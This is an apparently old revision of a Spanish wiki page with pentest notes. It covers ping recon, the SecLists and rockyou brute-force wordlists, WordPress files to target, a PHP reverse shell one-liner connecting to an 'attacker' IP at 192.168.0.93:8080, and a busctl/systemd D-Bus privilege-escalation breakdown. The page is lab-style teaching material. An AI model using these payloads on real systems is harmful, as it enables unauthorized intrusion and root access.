¡Esta es una revisión vieja del documento!
Normalmente siempre es conveniente saber cual es la ip
Ver si responde a pings y observar el trazado
ping -c1 192.168.0.213 -R PING 192.168.0.213 (192.168.0.213) 56(124) bytes of data. 64 bytes from 192.168.0.213: icmp_seq=1 ttl=64 time=1.75 ms RR: 192.168.0.93 (atacante) 192.168.0.213 (víctima) 192.168.0.213 (víctima) 192.168.0.93 (atacante) --- 192.168.0.213 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 1.746/1.746/1.746/0.000 ms
parámetros básicos y más utilizados
Ver si revela alguna información
Es específico para servidores web y útil si no sabemos interpretar bien los encabezados http del comando anterior
Fuerza bruta y pistas
Estructura, carpetas de seclists y archivos de interés | |
---|---|
Discovery | Directorios y archivos en servidores web |
Pattern-Matching | Patrones para extraer información sensible |
Routers | Usuarios, contraseñas por defecto en routers |
Fuzzing | Pruebas para identificar vulnerabilidades |
Miscellaneous | SQL injection, cross-site scripting (XSS) |
Passwords,Usernames | Ataques de fuerza bruta |
User-Agents | Cadenas para simular navegadores web y dispositivos |
Discovery/Web-Content/Logins.fuzz.txt | Paneles de login web .php,.asp,.rb,.py,logon.py etc |
Descargar, conocer seclists, un conjunto de diccionarios de fuerza bruta para poder hacer fuzzing
Descargar, conocer rockyou, un diccionario para poder hacer fuerza bruta con contraseñas al panel de login, ssh, etc
Identificar aplicaciones web instaladas, CMS
wp-admin | Redirecciona a wp-login.php, Panel de login |
wp-login.php | Panel de login |
xmlrpc.php | Usado para hacer fuerza bruta con wpscan, más rápido que al panel de login con hydra |
wp-config.php | Contiene nombres de usuario y contraseñas de bases de datos |
Buscar vulnerabilidades para las versiones detectadas de los servicios descubiertos
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.93/8080 0>&1'"); ?>
#!/bin/bash bash
sudo | Ejecuta con privilegios de root (necesario para cambiar propiedades de systemd) |
busctl | Herramienta para interactuar con D-Bus |
set-property | Subcomando de busctl para cambiar una propiedad expuesta vía D-Bus |
org.freedesktop.systemd1 | Servicio D-Bus de systemd |
/org/freedesktop/systemd1 | Objeto D-Bus raíz que representa al gestor de systemd |
org.freedesktop.systemd1.Manager | Interfaz D-Bus que gestiona systemd, Contiene propiedades y métodos para controlar systemd (iniciar/parar servicios, cambiar configuraciones, etc). |
LogLevel | Propiedad que se va a modificar |
s | Tipo de dato: s = string (en la notación de tipos de D-Bus) |
debug | Nuevo valor: debug (valor de la propiedad LogLevel) |
argv1=-c | Primer argumento pasado a /bin/sh, -c significa “ejecuta el siguiente comando como script |
argv2='/bin/sh -i | Ejecuta la shell en modo interactivo |
0<&2 | Redirige stderr a entrada estandar |
1>&2 | Redirige Salida estandar a stdrr |
…..continuará. Feliz hacking